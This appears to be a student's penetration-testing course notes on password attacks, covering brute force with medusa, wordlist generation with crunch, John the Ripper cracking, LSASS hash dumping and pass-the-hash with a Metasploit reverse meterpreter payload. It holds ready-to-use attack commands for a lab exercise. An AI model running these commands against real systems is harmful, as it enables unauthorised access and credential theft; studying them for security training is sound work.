boris/G4G0-2
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
ae837183f1ec23c09316de550f35d9b3d6759834
G4G0-2/Penetration Testing/Week 23/Week 23 - Password Attacks.md
boris ae837183f1 vault backup: 2025-03-16 18:59:42
2025-03-16 18:59:42 +00:00

45 lines
2.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

**Slide 1: Password Attacks**
- People are not good at remembering passwords, choosing easy ones (e.g., 123456), and reusing them.
- Password entropy increases with length and character variation. Longer passwords and those with mixed characters (upper/lowercase, numbers, special symbols) have more entropy.
- Using password managers and multi-factor authentication is recommended.
**Slide 2: Real-World Password Attacks**
- Most common attacks target weak or default user/system passwords.
- Brute force and dictionary attacks are common. Tools like `medusa` and `ncrack` automate these attacks.
- Online password attacks target networked services like HTTP, SSH, FTP, SNMP, RDP.
- Offline password attacks use captured password files and tools like `john the ripper`.
- Key space brute force generates all possible combinations of characters for a given set and length.
- Social engineering and shoulder-surfing can also be used.
**Slide 3: Online Password Attacks Example**
- Example of an HTTP brute force attack using `medusa` against a protected web directory.
- Command: `medusa -h <target> -u <username> -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/npttest -T 10 -s`
- Lessons: Be suspicious of the first password in a list, and don't put the correct one at the beginning when setting up demos.
**Slide 4: Key Space Brute-Force**
- `crunch` tool generates custom wordlists with defined character sets and password formats.
- Example: `crunch 6 6 0123456789ABCDEF -o test.txt` generates a list of 6-character hexadecimal passwords.
- Password length quickly becomes unmanageable with more characters.
**Slide 5: John the Ripper Offline Cracking Tool**
- `john` supports automatic mode, dictionary mode (using wordlists), and mangling rules.
- Example commands:
- Automatic mode: `john <password-file>`
- Dictionary mode: `john --wordlist=/usr/share/wordlists/rockyou.txt <password-file>`
- Mangling rules: `john --rules --wordlist=/usr/share/wordlists/rockyou.txt <password-file>`
**Slide 6: In-memory Attacks**
- Abusing OS handling of passwords, particularly useful for Windows due to shared identities.
- `pwdump` tool dumps SAM hashes by injecting a DLL into the LSASS process.
**Slide 7: Passing the Hash in Windows**
- Pass-The-Hash (PTH) allows authentication using hashes rather than passwords.
- `exploit/windows/smb/psexec` exploit with a reverse TCP meterpreter payload can be used for PTH.
**Slide 8: Task 3 Password Attack**
- Demonstrate various password attacks using different tools.
- Target at least two protocols (e.g., HTTP, FTP, SSH, RDP).
- Crack provided offline password hashes using wordlists and `crunch`.
- Crack a password-protected Word file, `TradeSecret.docx`, using office2john or zip2john.
- Perform an in-memory attack using PTH to authenticate into the Windows XP system.
Reference in New Issue View Git Blame Copy Permalink